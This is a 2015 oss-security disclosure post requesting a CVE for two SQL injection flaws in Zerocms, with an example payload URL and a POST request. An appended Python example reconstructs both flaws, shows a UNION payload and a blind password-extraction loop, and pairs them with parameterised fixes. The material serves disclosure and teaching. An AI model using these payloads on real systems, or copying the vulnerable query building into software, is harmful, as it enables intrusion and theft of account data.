Date: Sun, 1 Feb 2015 09:15:03 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:

http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a blind SQL injection and is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerability in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes here}&action=Modify+Account

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4
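Editor's note: the following is an added, self-contained example and is not code from the advisory above or from Zerocms. It reconstructs the two injection patterns the report describes (a SELECT that concatenates article_id, and an UPDATE that concatenates user_id) against a constructed SQLite schema, shows the six-column UNION payload and a boolean-blind extraction loop working against them, and places the parameterised, type-checked variants beside them. The table layout, column names, the "Modify Account" UPDATE statement and the sample password are all assumptions; SQLite's sqlite_version() stands in for the MySQL version() call in the advisory's payload, since SQLite has no database(), version() or user().

```python
import sqlite3
import string

# Constructed stand-in schema (hypothetical; the advisory does not show
# Zerocms's tables). articles has six columns so that the advisory's
# six-column UNION payload lines up with it.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (article_id INTEGER, title TEXT, body TEXT,
                               author TEXT, created TEXT, views INTEGER);
        INSERT INTO articles VALUES
            (1, 'Hello', 'First post', 'admin', '2015-01-01', 3);
        CREATE TABLE users (user_id INTEGER, name TEXT, email TEXT,
                            access_level INTEGER, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin@example.invalid', 2, 's3cret');
        INSERT INTO users VALUES (2, 'user',  'user@user.de',          1, 'pw');
    """)
    return conn

def _as_int(value):
    """Strict whole-number check used by the hardened variants."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return None

# --- Flaw 1: UNION-based injection through article_id (SELECT) -------------

def view_article_vulnerable(conn, article_id):
    # The request parameter is pasted straight into the SQL text, which is
    # the pattern the advisory reports for zero_view_article.php.
    sql = "SELECT * FROM articles WHERE article_id = " + article_id
    return conn.execute(sql).fetchall()

def view_article_fixed(conn, article_id):
    # Bound parameter plus type check: the value travels as data, never as SQL.
    ident = _as_int(article_id)
    if ident is None:
        return []
    return conn.execute(
        "SELECT * FROM articles WHERE article_id = ?", (ident,)).fetchall()

# sqlite_version() stands in for version() from the advisory's payload
# (assumption: SQLite has no database()/version()/user()).
UNION_PAYLOAD = "-1 union select sqlite_version(),2,3,4,5,6 -- "

# --- Flaw 2: blind injection through user_id (UPDATE) ----------------------

def modify_account_vulnerable(conn, user_id, name):
    # Hypothetical reconstruction of a "Modify Account" UPDATE: name is
    # bound, but user_id is concatenated. Returns rows changed, the only
    # signal the attacker gets back (did my own account change or not?).
    cur = conn.execute(
        "UPDATE users SET name = ? WHERE user_id = " + user_id, (name,))
    conn.commit()
    return cur.rowcount

def modify_account_fixed(conn, user_id, name):
    ident = _as_int(user_id)
    if ident is None:
        return 0
    cur = conn.execute(
        "UPDATE users SET name = ? WHERE user_id = ?", (name, ident))
    conn.commit()
    return cur.rowcount

def blind_extract(conn, own_user_id, victim_user_id, length,
                  alphabet=string.ascii_lowercase + string.digits):
    # Boolean-based blind extraction: each guess appends an AND condition to
    # the attacker's own user_id. The row is updated only when the guess is
    # right, so rowcount == 1 leaks one character per round.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            probe = ("%d AND (SELECT substr(password, %d, 1) FROM users "
                     "WHERE user_id = %d) = '%s'"
                     % (own_user_id, pos, victim_user_id, ch))
            if modify_account_vulnerable(conn, probe, "user") == 1:
                recovered += ch
                break
        else:
            break  # nothing matched: end of string or outside the alphabet
    return recovered

if __name__ == "__main__":
    db = make_db()
    print(view_article_vulnerable(db, UNION_PAYLOAD))  # leaks the engine version in column 1
    print(view_article_fixed(db, UNION_PAYLOAD))       # []
    print(blind_extract(db, 2, 1, 6))                  # admin's password, one character per round
    print(modify_account_fixed(db, "2 AND 1=1", "user"))  # 0: rejected before it reaches SQL
```

The blind loop is the part worth studying: the attacker never sees query output, only whether their own profile edit took effect, and that one bit per request is enough to read another row. The fix is the same for both flaws and is not input filtering: bind every value with a placeholder and reject anything that is not the expected type before it reaches the driver.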
